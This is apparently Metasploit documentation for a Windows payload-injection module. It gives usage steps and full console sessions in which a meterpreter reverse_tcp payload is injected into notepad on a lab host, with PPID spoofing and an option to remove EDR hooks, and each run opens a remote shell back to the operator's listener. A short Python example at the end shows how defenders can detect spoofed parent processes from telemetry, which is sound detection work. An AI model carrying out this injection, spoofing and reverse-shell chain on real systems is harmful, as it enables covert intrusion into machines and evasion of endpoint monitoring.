Description
This module leverages the reflective DLL injection technique to spawn a payload thread in the memory of another running process. To inject into the memory of another process, the meterpreter session must have the required permissions to allocate memory and create a remote thread in that process. The architecture of the payload must match the architecture of the process into which it is injected. If no process is specified, the module launches a notepad process matching the architecture of the selected payload and then injects into it.
Side-Effects
The PPID option can crash certain processes when used. To use the PPID feature, the meterpreter session must have permission to access the process identified by the PPID, and that process may also have attributes that limit the ability to use it as a PPID. Certain Windows Metro apps such as Calc or Edge will crash if you try to use them as the PPID.
Options
msf exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 3632 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION 1 yes The session to run this module on.
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Vulnerable Target
This module only works on Windows hosts.
Usage
- Create a meterpreter session on the remote host
- Begin interacting with the module: use exploit/windows/local/payload_inject
- Set the PAYLOAD and configure it correctly.
- If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true. Make sure that the SESSION value is set to the existing session identifier.
- Invoke the module: run
Scenarios
Windows 10 x64 Build 17134, No PID
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.135.168:5555
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49673) at 2020-01-22 13:10:13 -0600
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
meterpreter > sysinfo
Computer : DESKTOP-D1E425Q
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/payload_inject
msf exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION yes The session to run this module on.
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(windows/local/payload_inject) > set session 1
session => 1
msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/payload_inject) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION 1 yes The session to run this module on.
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(windows/local/payload_inject) > run
[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Running module against DESKTOP-D1E425Q
[*] Spawned Notepad process 684
[*] Injecting payload into 684
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 684
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49676) at 2020-01-22 13:12:07 -0600
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
88 4 Registry
.
.
.
684 7524 notepad.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Windows\System32\notepad.exe
.
.
.
7524 3632 revtcpx64.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Users\msfuser\Desktop\revtcpx64.exe
7532 4772 chrome.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
7876 780 WmiPrvSE.exe
7904 780 WmiPrvSE.exe
8000 584 svchost.exe
8036 584 svchost.exe
meterpreter > getpid
Current pid: 684
meterpreter >
Windows 10 x64 Build 17134, No PID, PPID spoofing
msf exploit(windows/local/payload_inject) > set PPID 3632
PPID => 3632
msf exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 3632 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION 1 yes The session to run this module on.
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(windows/local/payload_inject) > run
[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Running module against DESKTOP-D1E425Q
[*] Spawned Notepad process 1528
[*] Spoofing PPID 3632
[*] Injecting payload into 1528
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 1528
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49677) at 2020-01-22 13:16:31 -0600
meterpreter > getpid
Current pid: 1528
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
88 4 Registry
.
.
.
1528 3632 notepad.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Windows\System32\notepad.exe
.
.
.
3632 3452 explorer.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Windows\explorer.exe
.
.
.
7524 3632 revtcpx64.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Users\msfuser\Desktop\revtcpx64.exe
7532 4772 chrome.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
7904 780 WmiPrvSE.exe
7996 780 RuntimeBroker.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Windows\System32\RuntimeBroker.exe
8000 584 svchost.exe
8036 584 svchost.exe
meterpreter >
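In the second scenario the `ps` listing shows notepad 1528 with parent 3632 (explorer.exe) even though revtcpx64.exe (7524) created it, which is exactly what PPID spoofing is meant to achieve. The following added example (not part of the module or its documentation) shows the defender's side: given process-start telemetry that records both the parent a new process claims and the PID of the process that actually issued the create call (it is assumed here that the collector exposes such a field, for instance the emitting process of a kernel process-start ETW event), it flags every mismatch and reconstructs the claimed versus the actual lineage. The events are constructed from the PIDs in the scenario above.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcessStart:
    pid: int
    image: str
    parent_pid: int   # parent recorded for the new process (what `ps` shows; spoofable)
    creator_pid: int  # process that actually issued the create call (assumed telemetry field)


# Constructed sample modelled on the page's scenarios: explorer launched revtcpx64.exe,
# which spawned notepad 684 normally and notepad 1528 with its PPID spoofed to explorer.
SAMPLE_EVENTS: List[ProcessStart] = [
    ProcessStart(3632, "explorer.exe", 3452, 3452),
    ProcessStart(7524, "revtcpx64.exe", 3632, 3632),
    ProcessStart(684, "notepad.exe", 7524, 7524),
    ProcessStart(1528, "notepad.exe", 3632, 7524),
    ProcessStart(7996, "RuntimeBroker.exe", 780, 780),
]


def find_spoofed_parents(events: List[ProcessStart]) -> List[Tuple[int, str, int, int]]:
    """Flag every start whose recorded parent is not the process that created it.
    Returns (pid, image, claimed_parent_pid, actual_creator_pid) tuples."""
    return [(e.pid, e.image, e.parent_pid, e.creator_pid)
            for e in events if e.parent_pid != e.creator_pid]


def ancestry(events: List[ProcessStart], pid: int, actual: bool) -> List[str]:
    """Walk upward from pid and return the chain of image names, following the
    actual creator links (actual=True) or the recorded parent links (actual=False).
    Stops at a PID with no start event; the visited set guards against PID-reuse loops."""
    by_pid: Dict[int, ProcessStart] = {e.pid: e for e in events}
    chain: List[str] = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(ev.image)
        pid = ev.creator_pid if actual else ev.parent_pid
    return chain


if __name__ == "__main__":
    for pid, image, claimed, creator in find_spoofed_parents(SAMPLE_EVENTS):
        print(f"PID {pid} ({image}) claims parent {claimed} but was created by {creator}")
        print("  recorded lineage:", " <- ".join(ancestry(SAMPLE_EVENTS, pid, actual=False)))
        print("  actual lineage:  ", " <- ".join(ancestry(SAMPLE_EVENTS, pid, actual=True)))
```

A listing alone, like the `ps` output above, cannot reveal the mismatch; the check needs a process-creation event source that records the calling process.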